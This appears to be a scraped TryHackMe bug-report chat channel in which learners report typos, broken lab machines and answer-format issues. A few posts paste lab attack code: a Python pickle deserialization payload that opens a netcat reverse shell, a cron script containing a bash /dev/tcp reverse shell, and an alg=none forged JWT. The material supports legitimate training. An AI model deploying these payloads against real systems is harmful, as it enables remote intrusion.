Room : https://tryhackme.com/room/adventofcyber3
Task 17 : [Day 12] Sharing without Caring
Bug : READ permission on file id_rsa not set but the task ask you to md5sum id_rsa (on windows using certutil)

correct answer with "ol" instead of "old"

This is answer tolerance, not a bug. Refresh the page.

Done thanks

thanks

Gave +1 Rep to @eternal summit

So in the room intro to LAN on the ARP protocol questions i typed address wrong and got it right

This is answer tolerance again

Not sure if this is a bug or not - but the cheatsheet provided in the powerview module of https://tryhackme.com/room/postexploit was updated and no longer includes a mention to Invoke-ShareFinder

kenobi, task 3 question 2

the answer was 4

now it is only three.

Proof:

Did you check in the online database?
https://www.exploit-db.com/

nope

gimme a sec

not there are f4

got it

Room: Advent of Cyber 3 (https://tryhackme.com/room/adventofcyber3)
Task: 18 (Day 13, They Lost The Plan!)
Bug:
Command systeminfo | findstr /B /C: "OS Name"/C: "OS Version" has incorrect placement of spaces, it should be:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version". I don't think it is really that bad of a bug, but since AoC seems to aim at being beginner friendly this might be good to correct.

ROOM: AoC3 Task:18
Bug: The room accepts an incorrect answer for the return from a whoami command.
E: Looks like an answer tolerance and not a bug. Refresh returns textfield to expected value

Correct -- that is answer tolerance 🙂

Thanks! sorry

hi i found not a bug but a misleading info, where can i send you this?

put it here :)

oookey, in room
https://tryhackme.com/room/authenticate

Task 4

i think it is very misleading, when you complete all steps to JWT, the final encoded cookie in base64 doesnt match the one shown as copied from THM:

Since we placed the alg value to None we don't have to add a 3rd part or the encrypted value so we can just put a dot(.) after 2nd part and leave it like that. So the final string would look like:
eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.

But this cookie value is for answer to question and not the one for user2, i think thats why it is misleading, its not hard to understand and its not a bug

but i think it may mislead kind of few people, i saw multiple times people asked on this task in help room

today I started [Day 4] Web Exploitation Santa's Running Behind. the ip that it's given by the assignment wont work ?? it is thare in arp command in cmd but cant be pinged and wont load in firefox

I did try to reset the machine but it will stay on
to connect...

Advent of cyber 3 day 13, the command given does not work:

typo "Congraulations"

Thanks!

Gave +1 Rep to @untold olive

Ok now in the Path Linux Fundamentals 3 I have a problem with this: "wget http://10.10.226.25:8000/.flag.txt" the terminal says: "hhtp request send, awaiting response..."

@glad badger USTOUN room has a problem with mssql port! I spent some hours and tried restarting sometimes, but it didn't work! https://tryhackme.com/room/ustoun

I'm trying the room now as well and having the same port issue

Were you connected to the vpn?

Ustoun has been set to private until the creator can be reached to fix it 🙂
cc @teal barn @potent sage @cobalt mantle

2015 stated twice in nmap04 at "Nmap Scripting Engine (NSE)" at question 2

The room Rastislonge is talking about: https://tryhackme.com/room/nmap04

?

what did you have a problem with? || mssql? ||

The room has been made private due to the issues reported here. It's handled.

In room CC:Steganography in the EXAM in stage 2 is the link in the given wav file still working or I am missing something

Metasploit room - msfdb init cannot be ran due to the attackbox not having PostgreSQL installed, or by not having initdb or pg_ctl added to path

https://tryhackme.com/room/autopsy2ze0 towards the top it says "This room should help to reinforce what you learned in the Autopsy room."

the autopsy room is private

not a bug per-se, did A LOT of googling for this one

https://tryhackme.com/room/autopsy

In Splunk 101 room, Task 6 question 1 - Splunk query provided by uncoder.io has changed and is no longer accepted as a correct answer

Is it just me or OWASP Juice Shop room gives no points at all? Just completed the room to see the same amount of points I started it with 😛

@wheat fractal dont think so, as far as i can tell the rooms that give points have a thing at the top that shows it like this one: https://tryhackme.com/room/overpass

the chart

and the scoreboard i guess, never looked at that

far as i can tell only rooms with those tabs at the top give points: chart, scoreboard, writesups, whatever

I know how point system works. Btw, you can read more about it it here -> https://docs.tryhackme.com/docs/rooms/how-points-work/

Since OWASP Juice Shop is a walkthrough room, I should have been awarded with 25% of the available points towards my account and the 'all time' leaderboard. Yet, I was granted 0pts 😄

It doesn't need to be, but the room ought to say so

The chart is if they are marked as a "simple" room or not

Usually walkthroughs are marked as simple rooms, and challenges are not. Challenges will usually have the scoreboard to show competition

first one requesting "<" as part of it, but others are without, just made me spend 10 min on this 😄

XXE room

Refresh the page

yep, all good now

tnx

I still don't get it why OWASP Juice Shop doesn't give any points towards the all time scoreboard or account? Is it specified somewhere, what am I missing :/

It's not specified anywhere. It's an option the room creator can set

Well, thanks for clarifying that. I didn't know room creators are able to determine that 🙂

Gave +1 Rep to @eternal summit

Could you please check if there is a mistake here or if I am misunderstanding something?
Jr Pentester Path
Nmap Advanced

--2021-12-15 15:48:21--  http://10.10.49.77:8000/.flag.txt
Connecting to 10.10.49.77:8000... failed: Connection refused.```

@wheat fractal This is not a bug. Please ask in #room-help

Very minor typo in room "Weaponization". In Task 5 when creating the meterpreter payload, the instructions are to set LPORT 433 but then when setting up the listener, it says to use LPORT 443. Just a small thing that could cause some frustrations if someone misses it.

Fixed. Thank you for reporting 🙂

Gave +1 Rep to @trail merlin

solar-log4j task 8:

For other techniques, you are strongly encouraged t do your own research. There is a significant amount of information being shared in this Reddit thread: https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/
has a typo at the marked location where it should say to but only says t

and then same room in task 10:

Please be understanding of this frenzy. There are so many potential places that this log4j vulnerability could be present, we may never see the end of this vulnerability for a long, long time. The onus is on you, on me, on each and every one of us to raise awareness of this incident, and hold the community accountable for actively responding. When the time comes, roll out the patches that have been made available and continue to hunt for instances of this vulnerability. It takes a village.

the second one says onus instead of something shadow dunno what it is supposed to say

Type in room "Solar, exploiting log4j", First paragraph of task 1 reads: "offers remote code trivial remote code execution", the first "remote code" should be removed.

@rugged canyon onus is a word means like your responsibility

thats is correct

if my house is a mess...the onus is on me to clean it

huh today shadow learned thanks @haughty idol

Gave +1 Rep to @haughty idol

duty or responsibility i think it means

not a very common word i think

yeah not very common word

shadow thought the sentence was gonna read

the responsiblity is on us, is on you, on me, on each and every one of us......

Room "Solar, exploiting log4j", Task 5: Download file missing. If you open the dropdown to install Java 8 locally, it says: Select the jdk-8u181-linux-x64.tar.gz package (or alternatively, download the file attached to this task, added for your convenience). However, there is no file attached to this task. Downloading the file from the linked mirror took about 3-4 hours... 😴

not really a bug but https://tryhackme.com/room/subdomainenumeration asks you to start a machine in the 1st task...and that machine is not used for anything. The rest of the tasks have you just answer general questions or run commands in a split web view thing. I did recon and stuff and found a few things, wondering if those are easter eggs left for the user to find or were they supposed to have a purpose a long with the machine itself?

https://tryhackme.com/room/owasptop10

Task 26 refers to a github page that has been overwritten into a unrelated cloud app. “copy-and-paste the source code from this Github page”
https://gist.github.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3

Here is the original code meant for the room.
https://github.com/WCEHouck/Python_RCE/blob/main/rce.py

import pickle
import sys
import base64

command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f'

class rce(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))

print(base64.b64encode(pickle.dumps(rce())))```

Nmap, Post Port Scans, Task 4
Can you figure out the name for the script that checks for the remote code execution vulnerability MS15-034 (CVE2015-~~2015-~~1635)?

Jr Pentester
Protocols and servers
POP3
How many email messages are available to download via IMAP POP3 on XX.XX.XX.XX?

https://tryhackme.com/room/networkservices hello there are some missing images on here scattered throughout the tasks

I'm working through Common Linux Priv Escalations - Task 4, none of the users on the target machine have any cronjobs. But it was easy to get the answer with the hint.

None of them have cronjobs that you can see. Remember that each user has their own crontab in addition to the global crontab

So I'm older school unix guy and was looking in /var/spool/cron/crontabs for a list of the users crontab files. But on this box I found they are located in /etc/crontab!!

Hi! It seems like in the MAL: Researching room (https://tryhackme.com/room/malresearching) there is a typo in Task 3 Question 4. The question should ask how long will it take for 6 "billion" (not million) files to be hashed

in agentsudoctf, the image filename in ||james'|| home directory is misspelled ||Alien_autospy.jpg||

(AoC3, Day 16) Why does it say Darknet? Isnt it caled Deep web (everything not accessible by a search engine, for example sites behind login pages for schools, or onion sites, also refereed to the part of the iceberg that is under water)

Deep web is legitimate internet traffic (e.g. account pages, private forums, etc). Anything that isn't publicly accessible or indexed by search engines.

Dark web is stuff that's deliberately kept off the general internet. That's where you'd find onion sites.

In other words, they both exist, and the description in the room is correct

(btw it said Darknet in the room, not Darkweb)

Same difference smh

No they are not the same:

Darknet: ```
A dark net or darknet is an overlay network within the Internet that can only be accessed with specific software, configurations, or authorization, and often uses a unique customized communication protocol

https://en.wikipedia.org/wiki/Darknet
Darkweb: ```
The dark web is the World Wide Web content that exists on darknets: overlay networks that use the Internet but require specific software, configurations, or authorization to access
``` (TL;DR the content)
https://en.wikipedia.org/wiki/Dark_web

I didn't say they were the same, I said "same difference". i.e. for all intents and purposes they can be used interchangeably, unless you happen to be being obtusely pedantic about it 🤷‍♂️

But yes, if we are being very specific, sure, Network applies to the infrastructure, and Web applies to how the infrastructure is used

If I say that "I need TOR to access the dark net", it would be just as correct to say "I need TOR to access the dark web" -- just that the first refers to accessing the infrastructure, and the second refers to accessing the content on that infrastructure

Both result in me accessing information from it

ah, ok 👍

as long as people don't mix deep web and dark web shadow is happy

deep web = anything not indexed by search engines
dark web = requires special software like TOR to acccess

btw in the google dorking section it does not mention what order it is in. is it YYYY-MM-DD or is it YYYY-DD-MM

oh yeah that is a good idea to maybe add

@twin tapir

Fix

but shadow would assume YYYY-MM-DD as that is the standard set by iso in iso 8601

why do you talk in the third person?

old habit

k

Darknet fits as terminology in comparison to clearnet. The gist of the term is to understand the definition of it, and the examples for it. 🙂

Not sure if its a bug or not, but i just completed OWASP juice shop and i didnt get a single exp point for that

Some rooms don't give points

it appears the final challenge in this room is broken: https://tryhackme.com/room/netsecchallenge

i have tried every possible nnamp scan and that 0% doesnt move, ive also tried them all from an attackbox with same results. Looking at the console I get Firefox can’t establish a connection to the server at ws://10.10.6.89:8080/socket.io/?EIO=4&transport=websocket&sid=CUe16GrASi1uS1qfAAAQ. errors every second its looking like

I just ran the correct scan from the attack box. The flag popped for me. Maybe try #room-hints for a push in the right direction.

I'm doing the Linux PrvEsc room - Task 1 - I spin up the target VM. My VPN is setup and I can ping the target IP. But when I attempt to ssh to the machine I receive the following error:

"Unable to negotiate with 10.10.27.198 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss"

So I had to add the HostKeyAlgorithms option to login to the target VM:

ssh -oHostKeyAlgorithms=+ssh-dss user@<ip>

Cheers!

Hi, I've done the Nax room and rooted the box but it won't accept my answer for the Metasploit path (even though I'm pretty certain it's correct) so I can't collect the points for the room. Could someone who has done it have a look and tell me if I'm being stupid or not?😆

Did you solve it with MSF 6 (the Hint alludes to using it)?

just trying an update now

Just confirmed I'm on msf6 and it still wont work.

You probably have ||exploit/linux/http/nagios_xi_authenticated_rce||

@void vortex after speaking with someone in another room I did try from the attackbox and the flag came up right away. Thanks 🙂

Gave +1 Rep to @void vortex

Yeah that's what I've got, does the answer differ from that?

Check https://www.infosecmatter.com/metasploit-module-library/ and search on exploit/linux/http/nagios 🎄

Unsure if this is a bug or intended, but while taking the XSS room, I keep getting a random (to me unexpected) connection

root@ip-10-10-72-32:~# nc -lvnp 8081
Listening on [0.0.0.0] (family 0, port 8081)
Connection from 34.77.162.6 49909 received!
GET / HTTP/1.1
Host: aparat.com.leta.aparat-com.aparat---com.aparat--com.gq
User-Agent: Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com

Can anyone let me know if this is intended or something weird going on?
I'm running the AttackBox in the browser

You're being scanned, this is normal for internet connected devices.

I got that part, I just assumed that THM's AttackBoxes didn't have an allow all in rule from the public internet, but I guess they do then

They're internet connected

Not NAT'd etc

Well they have an RFC1918 IP so there's NAT going on in AWS I'd assume
But okay, I guess I'll just be annoyed by randoms scanning me while I'm trying to work on rooms
Thanks

Well they have an RFC1918 IP so there's NAT going on in AWS I'd assume Check your routes and interfaces.

When it's something easy to verify, why assume?
Also you can listen on a specific address/interface

Huh, okay
Sorry, just thought there was something in place and thought it was a bug possibly, but I guess allow all works well
Sorry for disturbing, was just trying to figure this out
Thanks!

aoc3 day 17s youtube link is wrong:
it should be: https://www.youtube.com/watch?v=RAgvdpvKJa0
it currently is: https://www.youtube.com/watch?v=RAgvdpvKJa
notice the missing 0 at the end of the link

Cc @glad badger quick one for you

🎄 Fixed 🎄

AoC3 Day 18, where was the -v flag used?

in the image below that text line @strong arrow

ah ok

or wait that is not a image apparently as you can copy text from it..... well the mockup terminal window then

kinda confusing that here is something showing the command, then it mentions something that is not in the command, but it works, I guess.

On the file inclusion the question answer on Task 3 (Path Traversal) is allows file_get_content when it's supposed to be file_get_contents

Have you not reported answer tolerance stuff before?

no, I have not

Well, in that case: it's answer tolerance

Refresh the page and it will have the real answer

(Bonus points if you can find the actual problems in that room though)

not a bug but in https://tryhackme.com/room/zthweb2 Task 7

the 1st sentence, not sure what this is supposed to mean:
Than sort of be exploited automatically.

Room : https://tryhackme.com/room/adventofcyber3
Task : 23
Bug : tar command option verbose missing (unless the comment refers to the command output below the comment):

(unless the comment refers to the command output below the comment): Yeah, it does.

Room: webosint (https://tryhackme.com/room/webosint)
Task 2: What country is listed for the registrant?
Bug: Namecheap's address is updated to ["Kalkofnsvegur 2","Reykjavik","Capital Region","101","IS"] from Panama. Its time to update the Question's answer as well!

Room: https://tryhackme.com/room/brainstorm
Bug: FTP
Behavior: unable to use dir and ls commands once connected to the FTP anonymous login.

**Room: **https://tryhackme.com/room/internal
Bug: unstable machine https://tryhackme.com/room/internal
Behavior: machine out of reach
Note: I troubleshoot the THM .ovpn and determined it had nothing to do with ti, I believe it is related to the VM or where the machine is being hosted.

https://tenor.com/view/haxxor-haxor-hack-hacker-mad-is-cute-gif-20709615

Have you tried under a new ip and have you restarted your machine

**Room: **Extending your network
https://tryhackme.com/room/extendingyournetwork
Task 2: Firewalls 101
The answer for the first question is different than the one given in the video guiding
||In the video the answer is Layer 3, Layer 2.
But now the right answer is Layer 3, Layer 4.||

Room: https://tryhackme.com/room/webosint
Bug: Need to update the answer format on Task 7. viewdns info showing Liquid Web on IP History not Liquid Web L.L.C

terminated 5 times the machine, regenerated the ovpn 2 times, rebooted my pentesting vm 2 times, rebooted the laptop once, update && upgrade everything and reboot, etc....

Ah must be a thm bug

not the first ones I've found, I have found about 5 - 7 across all paths and I haven't report them because I have found my way through but it is a total waste of time for a beginner since they would probably think they are doing something wrong or/similar etc..

I have learned that tryharding VM's will get you nowhere for example: tryhackme, what you want is to be able to apply the concepts taught to something/practice and if for some reason the THM VM is not being functional because of a bug or something that is out of our own control the best thing to do is build up the classroom or the practice scenario yourself and there are a tons of free resources online to build controlled practices.

for example: in the case of Brainstorm I download vulnserver on a windows 10 machine, install immunity debugger and start the whole buffer overflow process.

• spiking: find the vulnerable part of the program
• fuzzing: breaking the program
• finding offset: overwriting the pointer address
• finding bad characters
• finding the right module
• generating shell code

Hey, there's a problem at Task 6 on this room : https://tryhackme.com/room/nmap02. Basically it's port 68 with service dhcpc but it dont work

though its not, if you run the scan they tell you, your results should be different than that imnage

and port 68 dhpcd cannot be the answer because its in that image so its not new

bruh when I ran the scan I only see port 68 and 111, maybe because of the machine IP?

@raw field looking at that room there are 3 machines, did you terminate the previous machine and star the machine for this task?

each one is different

make you started the correct machine for the task you are doing

Hello, all.
I thinks this is a bug in https://tryhackme.com/room/linprivesc on the "Task 9 Privilege Escalation: Cron Jobs". It seems like cron doesn't work.
I changed ||backup.sh|| file to:

karen@ip-10-10-68-44:~$ cat backup.sh 
#!/bin/bash
#cd /home/admin/1/2/3/Results
#zip -r /home/admin/download.zip ./*
# nc 10.10.89.34 4444
echo "TEST" > /home/karen/test.txt
bash -i >& /dev/tcp/10.10.89.34/4441 0>&1

If I execute this file by

. ./backup.sh

I can see that test.txt file was created. But the backup.sh doesn't execute by crontab. I tried to create ||antivirus.sh|| in the home folder to test it. And again without any success. Is it crontab bug or I'm doing something wrong?

@untold pike did you look at /etc/crontab on the machine, i believe the machine is different than the examples? i could be wrong

starting the machine up so i can get a better idea of whats going on..

nvm, got into it and the examples are the same for the most part

hrm, doesnt look like the cron is running at all, had pspy64 running for like 10 minutes now

worked for me when i did it. maybe it did an upgrade and broke itself? i see unatttended upgrades running every few minutes

@glad badger sounds like cron is broken in Linux Privesc 🙂
Also, whilst whoever's fixing Alper's box is in there, they may wish to turn off unattended upgrades: that'll no doubt be slowing things down a bit...

@obsidian kiln yeah had pspy running for 20 minutes, the backup.sh fired off once, TONS of calls to /usr/sbin/CRON

dunno if thats causing the issue

the antivirus.sh never fired off

Honestly? I ain't going in there to debug it rn 🤷‍♂️
It's a box developed by a (prior) member of the internal development team, and I have my own work to do. If I had a little more time I'd go and find the problem / sort a fix, but as it stands, it's something that will need to be handled by QA

i do sort of remember having issues with a box and cron jobs, had to restart the box multiple times before the cron ran correctly

cant recall if it was this one but yeah, every minute about 10 or so calls to /usr/sbin/CRON -f

By all accounts there are more than a few issues with those boxes. The fact that there's more than one in the room at all is unnecessary.
As I said though, it will need to be sorted by someone on the internal team at this point 🙂

cool, glad i could be of some assistance in figuring it out

https://tryhackme.com/room/linuxfundamentalspart2 Task5
there is no cmnatic.pem in the screenshot as stated in the text
last screenshot states user it should be user2 according to the screenshot

Complete beginner > network services > task 9 > question 1. It asks us how many ports are open by running an nmap scan which shows only 1 port is open. But it gets marked correct only when we write 2 in it

@wheat fractal if you don't specify, nmap will scan most popular ports. Maybe second port is opened at an unusual port ?

As you can read from here

https://nmap.org/book/port-scanning-tutorial.html

How can I get some news when LinPrivEsc is fixed? I'd subscribe for this. 🙂

I was able to finish that room without having any bugs

Interesting

Of course I had to try so many things until I make it work but I thought problem is because of me

Thanks. If you need any help or test - just let me know

Gave +1 Rep to @fringe thistle

heyyo, coming from phishing room 3: | https://tryhackme.com/room/phishingemails3tryoe |
Task 8, Q 5 asks for the windows process that was flagged as "Potentially Bad Traffic", but in the report the process was redacted. i surfed around a bit and couldn't find the answer, so posting here as a bug.

snapshot of the redacted info

relevant room, did a wfuzz directory search on the second web server. the web server crashed after a while

Hi, I think I've identified an error in the Solar room

https://tryhackme.com/room/solar

In Task 5, Trouble shooting information, it states that;

Revisit your HTTP server.

1. Ensure it is in fact running.
2. Ensure it is running in the same folder as your Exploit.java file.

But doesn't the Exploit.java needs to be Exploit.class, since this is the compiled exploit?

@little merlin (tagging you since you appear to be the creator)

Ah, sure thing.

hi @little merlin

great site you got here 🙂
finally getting into cybersecurity after watching your video on the 1st about he AoC. Been having lots of fun 🙂

Kudos to all the THM folks, TryHackMe is their baby 😛

am i crazy or is thare no start box ?

at Task 14 [Day 9] Networking Where Is All This Data Going

nvm

MAL: Strings room, Task 4, Q1 - the number of transactions is outdated.

@dusky junco

Edit: Nevermind: There's a WAY less obvious answer that's "correct". Still, I consider this to be at least a problem with the question.

Hey, I think there might be a bug in the "Red Team Recon" room (https://tryhackme.com/room/redteamrecon)

In Task 6, there's the following question:
censys_email_address is a module that “retrieves email addresses from the TLS certificates for a company.” Who is the author?

The answer is relatively easy to obtain, but not accepted. I tried various options, but I believe there to be an error.

in linuxfundamentalspart2 the important file has read permissions for other, allowing to read it without actually switching to user2 as instructed.

Just FYI - The CC: Pen Testing room has had a couple of glitches.

Task #17, Question #6 doesn't come up with a flag. Only <blank>.

Task #17 -> Your version of sqlmap is broken, download the one from the official sqlmap github

Cheers!

Yep that worked

i think splunk101 room has a bug in task 6 where it doesn't accept correct answer for a sigma rule.

AoC day 21

the result is 1, but the answer is 0

*last question of Day 21

because the zero in the yara file is not a zero but an "O"

details details 🙂

"yara code"

so change the "O" to a zero and you'll get the correct answer 🙂 @fading idol

https://tryhackme.com/room/redteamrecon Task 5 All the hyperlink references to ViewDNS.info have a typo as VidewDNS.info

https://tryhackme.com/room/blueprint Task 1 typo References NTML hash instead of NTLM

linuxfundpart1v1, Task 4. On my VM (vnc.tryhackme.tech) username is 'root' but correct answer is 'tryhackme'. And 'commend' instend 'command' in 'Hint'.

That means you're using the attackbox, not the target machine.

oh, thanx!

Hello, I've been working on this question from 'Burp Suite' room for a long time and have yet to discover an answer. I followed the instructions and even examined the writeups, but I still couldn't figure it out.
Answer validation for this question seems to have some bug(?), since it is not accepting the correct response. Could you please look into this and provide me with a solution to this question?
Thank you in advance.
Task 9 --> Help! There's an Intruder!

Q-->
Finally, click 'Start attack'. What is the first payload that returns a 200 status code, showing that we have successfully bypassed authentication?

https://tryhackme.com/room/networkservices this room has broken image links

I've been having a problem here as well but perhaps a tad different

yep mine was a layer 8 issue

Hi! I think I found a bug in an answer form

I filled out a guess, bases on the asterisks, while I was waiting for the machine to load, and it was correct, even though I think the correct answer is something else

Is this supposed to be like this? Can't answer most of the questions room/ctf

Doesn't look like a bug. The questions are practically rhetorical, the idea is to prompt you on the correct paths

Surely! Thank you

Gave +1 Rep to @eternal summit

is the Nax room broken ? just cant get the exploitation module - then looked at walkthroughs and entered what they got and still doesn't work

IDs reference may lead to misconception for new comers / none security people

room:https://tryhackme.com/room/adventofcyber3

Task 22 [Day 17] Cloud Elf Leaks

ids : identifiers not intrusion detection system .
correct me if i am wrong

is this the right place to say this ?

The day 22 task on AoC2021 wont run the oledump.py it returns only blank.

I think the following sentence in the room "Red Team Recon" should be: "The final tool that ships with Unix-like systems is traceroute, or on MS Windows Systems, tracert"

AoC3 Day 22 the example use of oledump.py wont work, how a python program is run is by first running the python cli tool than telling it what file to run python file.py so how it is shown in the example does not work

it works

if in the beggining of the file you have #!/bin/python

Incorrect

Both Windows and *nix can handle scripts being run without specifying the interpreter

Windows does it by registering the file extension to the interpreter (e.g. anything with .py goes to the Python interpreter). *nix uses a "Shebang", which is what Yuri said above